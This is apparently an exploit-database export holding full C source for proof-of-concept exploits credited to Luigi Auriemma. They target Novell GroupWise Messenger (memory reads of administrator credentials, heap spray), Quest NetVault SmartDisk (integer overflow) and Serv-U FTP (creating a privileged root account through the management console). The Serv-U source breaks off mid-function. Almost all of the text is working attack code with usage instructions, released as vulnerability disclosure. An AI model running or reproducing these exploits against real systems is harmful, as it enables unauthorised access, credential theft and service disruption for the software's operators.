\"NM_A_SZ_TRANSACTION_ID\", 8, BOFCHR,\r\n NULL, -1, NULL);\r\n\r\n } else if(bug == 1) {\r\n send_gwm(sd, \"login\",\r\n \"NM_A_PARM1\", 12, BOFCHR,\r\n NULL, -1, NULL);\r\n\r\n } else if(bug == 2) {\r\n printf(\"- read memory at offset 0x%08x (administrator FDN username):\\n\", BUG2a);\r\n send_gwm(sd, \"getdetails\",\r\n \"NM_A_SZ_DN\", 8, BUG2a,\r\n NULL, -1, NULL);\r\n\r\n printf(\"- read memory at offset 0x%08x (administrator password):\\n\", BUG2b);\r\n send_gwm(sd, \"getdetails\",\r\n \"NM_A_SZ_DN\", 8, BUG2b,\r\n NULL, -1, NULL);\r\n\r\n } else if(bug == 3) {\r\n printf(\"- heap spray, you will get a write4 in 0x%08x\\n\", BOFCHR); \r\n for(i = 0; i < 50; i++) {\r\n send_gwm(sd, \"createsearch\",\r\n \"test\", 10, NULL, // NULL here is a string of about 4000 'a's\r\n NULL, -1, NULL);\r\n\r\n send_gwm(sd, \"createsearch\",\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n NULL, -1, NULL);\r\n }\r\n\r\n printf(\r\n \"- now I need to join the Messenger server with a valid account.\\n\"\r\n \" I will use the account with username \\\"admin\\\" and password\\n\"\r\n \" \\\"adminpass\\\" so that it's not needed to create additional accounts\\n\"\r\n \" (boring operation) for verifying this vulnerability.\\n\"\r\n \" be sure to have this account on your eDirectory server.\\n\"\r\n \" press RETURN to continue the test\\n\");\r\n fgets(tmp, sizeof(tmp), stdin);\r\n\r\n send_gwm(sd, \"login\",\r\n //\"NM_A_PARM1\", 10, \"Sx6ItFwErgcmyZ62tIbi3w%3d%3d\", // blowfish of \"test::test\"\r\n \"NM_A_PARM1\", 10, 
\"1Bi2DNQGfH0ScFGkgDD8dVHeYP%2bt9VL7\", // blowfish of \"admin::adminpass\"\r\n \"NM_A_SZ_USER_AGENT\", 10, \"NGWMW%2f2%2e0%2e2+%28Windows+Server+2003%3b+5%2e2%29\",\r\n \"NM_A_UD_BUILD\", 8, 7,\r\n NULL, -1, NULL);\r\n\r\n send_gwm(sd, \"getattribs\",\r\n NULL, -1, NULL);\r\n\r\n send_gwm(sd, \"createsearch\",\r\n \"test\", 9, 0,\r\n NULL, -1, NULL);\r\n\r\n } else {\r\n printf(\"\\nError: invalid bug number (%d)\\n\", bug);\r\n exit(1);\r\n }\r\n\r\n//quit:\r\n close(sd);\r\n printf(\"\\n- done\\n\");\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint tcp_recv(int sd, u8 *buff, int size) {\r\n int i;\r\n u8 c;\r\n\r\n for(i = 0; i < size; i++) {\r\n if(recv(sd, buff ? (buff + i) : ((void *)&c), 1, 0) <= 0) return(-1);\r\n }\r\n return(i);\r\n}\r\n\r\n\r\n\r\nint recv_gwm(int sd) {\r\n static u8 *buff = NULL;\r\n u32 len;\r\n int crlf = 0,\r\n eof = 0;\r\n u16 type;\r\n u8 c;\r\n\r\n for(;;) {\r\n len = recv(sd, (void *)&c, 1, 0);\r\n if(len <= 0) return(-1);\r\n if(c == '\\n') crlf++;\r\n if(c > '\\r') crlf = 0;\r\n if(crlf >= 2) break;\r\n }\r\n\r\n printf(\"\\n\");\r\n do {\r\n if(tcp_recv(sd, (void *)&type, 2) < 0) return(-1);\r\n if(type == 0x683c) { // \"<html>\", yeah it's lame but this is only a PoC\r\n if(tcp_recv(sd, NULL, BUFFSZ) < 0) return(-1);\r\n break;\r\n }\r\n\r\n if(tcp_recv(sd, (void *)&len, 4) < 0) return(-1);\r\n buff = realloc(buff, len); // no !buff check, will be automatically skipped\r\n if(tcp_recv(sd, buff, len) < 0) return(-1);\r\n if(buff) printf(\" %-26s \", buff);\r\n if(!buff || !strcmp(buff, \"NM_A_SZ_TRANSACTION_ID\")) eof = 1;\r\n\r\n if(tcp_recv(sd, (void *)&len, 4) < 0) return(-1);\r\n if((type == 10) || (type == 13)) {\r\n buff = realloc(buff, len); // no !buff check, will be automatically skipped\r\n if(tcp_recv(sd, buff, len) < 0) return(-1);\r\n if(buff) printf(\"%s\\n\", buff);\r\n } else {\r\n printf(\"%d\\n\", len);\r\n }\r\n } while(!eof);\r\n printf(\"\\n\");\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint send_gwm(int sd, u8 *cmd, ...) 
{\r\n static u8 buff[BUFFSZ + 1],\r\n tmp[MAXSZ + 1];\r\n static int tid = 0;\r\n va_list ap;\r\n int type,\r\n len;\r\n u8 *p,\r\n *s1,\r\n *s3;\r\n\r\n p = buff;\r\n p += sprintf(p,\r\n \"POST /%s HTTP/1.0\\r\\n\"\r\n \"\\r\\n\",\r\n cmd);\r\n\r\n va_start(ap, cmd);\r\n for(;;) {\r\n s1 = va_arg(ap, u8 *);\r\n if(!s1) break;\r\n type = va_arg(ap, int);\r\n if((type == 10) || (type == 13)) {\r\n s3 = va_arg(ap, u8 *);\r\n if(!s3) { // max string\r\n memset(tmp, BOFCHR & 0xff, MAXSZ);\r\n tmp[MAXSZ] = 0;\r\n s3 = tmp;\r\n } else if((u32)(s3) <= 0x1000) {\r\n sprintf(tmp, \"%d\", (u32)s3);\r\n s3 = tmp;\r\n }\r\n } else {\r\n sprintf(tmp, \"%d\", va_arg(ap, int));\r\n s3 = tmp;\r\n }\r\n p += sprintf(p,\r\n \"&tag=%s\"\r\n \"&cmd=0\"\r\n \"&val=%s\"\r\n \"&type=%d\",\r\n s1, s3, type);\r\n }\r\n va_end(ap);\r\n\r\n p += sprintf(p,\r\n \"&tag=%s\"\r\n \"&cmd=0\"\r\n \"&val=%d\"\r\n \"&type=%d\"\r\n \"\\n\",\r\n \"NM_A_SZ_TRANSACTION_ID\", ++tid, 10);\r\n\r\n len = p - buff;\r\n if(len > BUFFSZ) {\r\n printf(\"\\nError: too much data (%d) for the send buffer (%d)\\n\", len, BUFFSZ);\r\n exit(1);\r\n }\r\n\r\n //printf(\">SEND\\n%s\\n\", buff);\r\n if(send(sd, buff, len, 0) < 0) return(-1);\r\n\r\n if(recv_gwm(sd) < 0) return(-1);\r\n\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint timeout(int sock, int secs) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n\r\n tout.tv_sec = secs;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n if(select(sock + 1, &fd_read, NULL, NULL, &tout)\r\n <= 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu32 resolv(char *host) {\r\n struct hostent *hp;\r\n u32 host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u32 *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n 
exit(1);\r\n }\r\n#endif\r\n\r\n\r\n\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18885"}, {"lastseen": "2018-03-20T01:22:52", "references": [], "description": "Exploit for windows platform in category local exploits", "edition": 2, "reporter": "Luigi Auriemma", "published": "2012-07-01T00:00:00", "title": "Quest NetVault SmartDisk <= 1.2.1 integer overflow", "type": "zdt", "enchantments": {"score": {"modified": "2018-03-20T01:22:52", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/", "value": 5.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-07-01T00:00:00", "id": "1337DAY-ID-18888", "href": "https://0day.today/exploit/description/18888", "sourceData": "--------\r\nwinerr.h\r\n--------\r\n\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not 
supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host 
not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n\r\n--------------\r\npercolator_1.c\r\n--------------\r\n\r\n/*\r\n by Luigi Auriemma\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <time.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n #define sleep Sleep\r\n #define ONESEC 1000\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n\r\n #define ONESEC 1\r\n#endif\r\n\r\ntypedef uint8_t u8;\r\ntypedef uint16_t u16;\r\ntypedef uint32_t u32;\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define PORT 37452\r\n#define BUFFSZ 0x100000\r\n#define BUG 0x10000000\r\n\r\n\r\n\r\nint putss(u8 *data, u8 *str);\r\nint putmm(u8 *data, u8 *str, int size);\r\nint putxx(u8 *data, u32 num, int bits);\r\nint timeout(int sock, int secs);\r\nu32 resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct linger ling = {1,1};\r\n struct sockaddr_in peer;\r\n int sd,\r\n i,\r\n t,\r\n len;\r\n u16 port = PORT;\r\n u8 *host,\r\n *buff,\r\n *p;\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"Quest NetVault SmartDisk <= 1.2.1 integer overflow \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: aluigi.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 2) {\r\n printf(\"\\n\"\r\n \"Usage: %s <host> [port(%d)]\\n\"\r\n \"\\n\", argv[0], port);\r\n exit(1);\r\n }\r\n\r\n host = argv[1];\r\n if(argc > 2) port = 
atoi(argv[2]);\r\n\r\n peer.sin_addr.s_addr = resolv(host);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\",\r\n inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));\r\n\r\n buff = malloc(BUFFSZ);\r\n if(!buff) std_err();\r\n\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n\r\n len = 3 + (BUG * 2) + 2 + 1; // should be ok\r\n\r\n printf(\"- send header\\n\");\r\n p = buff;\r\n p += putxx(p, 4 + 4+1+4+4 + len+0x400, 32); // packet size (included itself)\r\n p += putxx(p, 4+1+4+4 + len+0x400, 32); // message size\r\n p += putxx(p, 0x01, 8); // opcode\r\n p += putxx(p, 0xc8000000, 32); // sub-opcode or similar\r\n p += putxx(p, len, 32); // size of the entries\r\n p += putss(p, \"ox;\");\r\n send(sd, buff, p - buff, 0);\r\n\r\n printf(\"- send 0x%08x entries, wait some seconds:\\n\", BUG);\r\n\r\n /* normal slow solution\r\n for(i = 0; i < BUG; i++) { // integer overflow\r\n if(!(i & 0xffff)) printf(\" %08x\\r\", i);\r\n send(sd, \"S;\", 2, 0);\r\n }\r\n */\r\n\r\n // fast solution\r\n t = BUFFSZ / 2;\r\n p = buff;\r\n for(i = 0; i < t; i++) {\r\n p += putmm(p, \"i;\", 2);\r\n }\r\n len = p - buff;\r\n for(i = 0; (i + t) <= BUG; i += t) {\r\n printf(\" %08x\\r\", i);\r\n send(sd, buff, len, 0);\r\n }\r\n for(; i < BUG; i++) {\r\n send(sd, buff, 2, 0);\r\n }\r\n send(sd, \"i;\", 3, 0); // ebp - 1\r\n printf(\" %08x\\n\", i + 1);\r\n\r\n // the following data is useless at the moment because not read\r\n for(i = 0; i < 0x100; i++) {\r\n send(sd, \"AAAA\", 4, 0);\r\n }\r\n\r\n if(!timeout(sd, 3)) {\r\n len = recv(sd, buff, BUFFSZ, 0);\r\n }\r\n close(sd);\r\n\r\n printf(\"- done\\n\");\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint putss(u8 *data, u8 *str) {\r\n int len;\r\n u8 *p;\r\n\r\n len = 0;\r\n if(str) len = strlen(str);\r\n p = 
data;\r\n p += putmm(p, str, len);\r\n return(p - data);\r\n}\r\n\r\n\r\n\r\nint putmm(u8 *data, u8 *str, int size) {\r\n if(size < 0) size = strlen(str);\r\n memcpy(data, str, size);\r\n return(size);\r\n}\r\n\r\n\r\n\r\nint putxx(u8 *data, u32 num, int bits) {\r\n int i,\r\n bytes;\r\n\r\n bytes = bits >> 3;\r\n for(i = 0; i < bytes; i++) {\r\n //data[i] = num >> ((bytes - 1 - i) << 3);\r\n data[i] = num >> (i << 3);\r\n }\r\n return(bytes);\r\n}\r\n\r\n\r\n\r\nint timeout(int sock, int secs) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n\r\n tout.tv_sec = secs;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n if(select(sock + 1, &fd_read, NULL, NULL, &tout)\r\n <= 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu32 resolv(char *host) {\r\n struct hostent *hp;\r\n u32 host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u32 *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18888"}, {"lastseen": "2018-01-03T09:02:01", "references": [], "description": "Exploit for windows platform in category dos / poc", "edition": 2, "reporter": "Luigi Auriemma", "published": "2012-07-01T00:00:00", "title": "Serv-U FTP <= 11.1.0.3 possible management console access", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-03T09:02:01", "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N/", "value": 4.0}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-07-01T00:00:00", "id": "1337DAY-ID-18886", "href": "https://0day.today/exploit/description/18886", "sourceData": "--------\r\n\r\nwinerr.h\r\n\r\n--------\r\n\r\n/*\r\n Header file used for manage 
errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: 
error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n\r\n----------\r\nservu_1b.c\r\n----------\r\n\r\n/*\r\n by Luigi Auriemma\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <ctype.h>\r\n#include <time.h>\r\n#include <inttypes.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n #define sleep Sleep\r\n #define ONESEC 1000\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include 
<arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n\r\n #define ONESEC 1\r\n #define strnicmp strncasecmp\r\n #define strnistr strncasestr\r\n#endif\r\n\r\n#ifdef WIN32\r\n #define quick_thread(NAME, ARG) DWORD WINAPI NAME(ARG)\r\n #define thread_id HANDLE\r\n#else\r\n #define quick_thread(NAME, ARG) void *NAME(ARG)\r\n #define thread_id pthread_t\r\n#endif\r\n\r\nthread_id quick_threadx(void *func, void *data) {\r\n thread_id tid;\r\n#ifdef WIN32\r\n DWORD tmp;\r\n\r\n tid = CreateThread(NULL, 0, func, data, 0, &tmp);\r\n if(!tid) return(0);\r\n#else\r\n if(pthread_create(&tid, NULL, func, data)) return(0);\r\n#endif\r\n return(tid);\r\n}\r\n\r\nvoid quick_threadz(thread_id tid) {\r\n#ifdef WIN32\r\n DWORD ret;\r\n\r\n for(;;) {\r\n if(!GetExitCodeThread(tid, &ret)) break;\r\n if(!ret) break;\r\n Sleep(100);\r\n }\r\n#else\r\n pthread_join(tid, NULL);\r\n#endif\r\n}\r\n\r\ntypedef uint8_t u8;\r\ntypedef uint16_t u16;\r\ntypedef uint32_t u32;\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define PORT 21\r\n#define BUFFSZ 4096\r\n#define ADMIN_PORT 43958\r\n\r\n\r\n\r\ntypedef struct {\r\n struct sockaddr_in peer;\r\n int sd;\r\n int n;\r\n long long start;\r\n long long session;\r\n long long end;\r\n thread_id tid;\r\n int done;\r\n} args_t;\r\n\r\n\r\n\r\nquick_thread(servu_scan, args_t *args);\r\nint delimit(u8 *data);\r\nint conna(struct sockaddr_in *peer);\r\nint get_ftp_port(u8 *buff, u32 *ip);\r\nint recv_ftp(int sd, u8 **rbuff);\r\nint send_ftp(int sd, u8 *cmd, u8 *arg);\r\nint timeout(int sock, int secs);\r\nu32 resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nstatic int debug = 0,\r\n exploit = 4;\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct sockaddr_in peer;\r\n long long session;\r\n args_t *args;\r\n int sd,\r\n i,\r\n n,\r\n res = -1;\r\n u16 port = PORT;\r\n u8 *host,\r\n *user,\r\n *pass,\r\n *sess,\r\n *p,\r\n *l;\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n 
fputs(\"\\n\"\r\n \"Serv-U FTP <= 11.1.0.3 possible management console access \" VER \"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: aluigi.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 5) {\r\n printf(\"\\n\"\r\n \"Usage: %s [-d/e] <session_start> <username> <password> <host> [port(%d)]\\n\"\r\n \"\\n\"\r\n \"- this proof-of-concept demonstrates the vulnerability by creating the user\\n\"\r\n \" root with password root having full access and privileges, watch the source\\n\"\r\n \" code and choose the other examples using the -e option\\n\"\r\n \"- your user MUST have write privileges to exploit the vulnerability\\n\"\r\n \"- session_start is the value from which starting the scanning, for example\\n\"\r\n \" 9000 if both the server and the management console have been just started,\\n\"\r\n \" you can also specify multiple starts like 8000,9000,10000,11000 and the\\n\"\r\n \" tool will scan them in multi-threading increasing the speed\\n\"\r\n \"- successfully tested with Windows XP and 2003 Server\\n\"\r\n \"- it's not clear if Windows 7/2008 is vulnerable, Linux not tested\\n\"\r\n \"\\n\"\r\n \"Example: servu_1b 9000,12000,14000 myuser mypass example.com\\n\"\r\n \"\\n\", argv[0], port);\r\n exit(1);\r\n }\r\n\r\n // just for my tests\r\n for(i = 1; i < argc; i++) {\r\n if(argv[i][0] != '-') break;\r\n if(!strcmp(argv[i], \"-d\")) {\r\n debug = 1;\r\n } else if(!strcmp(argv[i], \"-e\")) {\r\n i++;\r\n exploit = atoi(argv[i]);\r\n }\r\n }\r\n\r\n sess = argv[i];\r\n user = argv[i + 1];\r\n pass = argv[i + 2];\r\n host = argv[i + 3];\r\n if((i + 4) < argc) port = atoi(argv[i + 4]);\r\n\r\n peer.sin_addr.s_addr = resolv(host);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));\r\n\r\n printf(\r\n \"- create a file containing the commands to send to the server\\n\"\r\n \"- it must have the correct Session number so 
let's go with the scan\\n\");\r\n\r\n n = 0;\r\n for(i = 0; sess[i]; i++) {\r\n if(sess[i] == ',') n++;\r\n }\r\n n++;\r\n args = calloc(sizeof(args_t), n + 1);\r\n if(!args) std_err();\r\n\r\n p = sess;\r\n for(i = 0; *p; i++) {\r\n l = strchr(p, ',');\r\n if(l) *l = 0;\r\n session = atol(p);\r\n\r\n sd = conna(&peer);\r\n\r\n if(recv_ftp(sd, &p) < 0) goto quit;\r\n\r\n if(send_ftp(sd, \"USER\", user) < 0) goto quit;\r\n if(recv_ftp(sd, &p) < 0) goto quit;\r\n\r\n if(send_ftp(sd, \"PASS\", pass) < 0) goto quit;\r\n if(recv_ftp(sd, &p) < 0) goto quit;\r\n\r\n memcpy(&args[i].peer, &peer, sizeof(struct sockaddr_in));\r\n args[i].sd = sd;\r\n args[i].n = i;\r\n args[i].start = session;\r\n args[i].end = -1;\r\n args[i].tid = quick_threadx(servu_scan, &args[i]);\r\n\r\n if(!l) break;\r\n p = l + 1;\r\n }\r\n\r\n for(i = 0; args[i].tid; i++) {\r\n if(i) args[i - 1].end = args[i].start;\r\n }\r\n\r\n printf(\"\\n- Current Session:\\n\");\r\n\r\n for(;;) {\r\n n = 0;\r\n for(i = 0; args[i].tid; i++) {\r\n if(args[i].done) n++;\r\n }\r\n if(n >= i) break;\r\n\r\n printf(\"\\r\");\r\n for(i = 0; args[i].tid; i++) {\r\n printf(\" %-14\"PRIu64\"\", args[i].session);\r\n if(debug) printf(\"\\n\");\r\n }\r\n sleep(ONESEC);\r\n }\r\n //for(i = 0; args[i].tid; i++) {\r\n //quick_threadz(args[i].tid);\r\n //}\r\n\r\n res = 0;\r\n\r\nquit:\r\n //close(sd);\r\n if(res < 0) {\r\n printf(\"\\nError: something wrong in the protocol or the connection\\n\");\r\n } else {\r\n printf(\"\\n- done\\n\");\r\n }\r\n return(0);\r\n}\r\n\r\n\r\n\r\nquick_thread(servu_scan, args_t *args) {\r\n struct sockaddr_in peer;\r\n long long session;\r\n int sd,\r\n s,\r\n len,\r\n hlen,\r\n ret,\r\n delperm = 1,\r\n res = -1;\r\n u8 fname[64],\r\n http[1024],\r\n *buff,\r\n *p;\r\n\r\n sd = args->sd;\r\n\r\n buff = malloc(BUFFSZ + 1);\r\n if(!buff) std_err();\r\n\r\n if(send_ftp(sd, \"TYPE\", \"I\") < 0) goto quit;\r\n ret = recv_ftp(sd, &p);\r\n if(ret < 0) goto quit;\r\n if((ret / 100) != 2) goto 
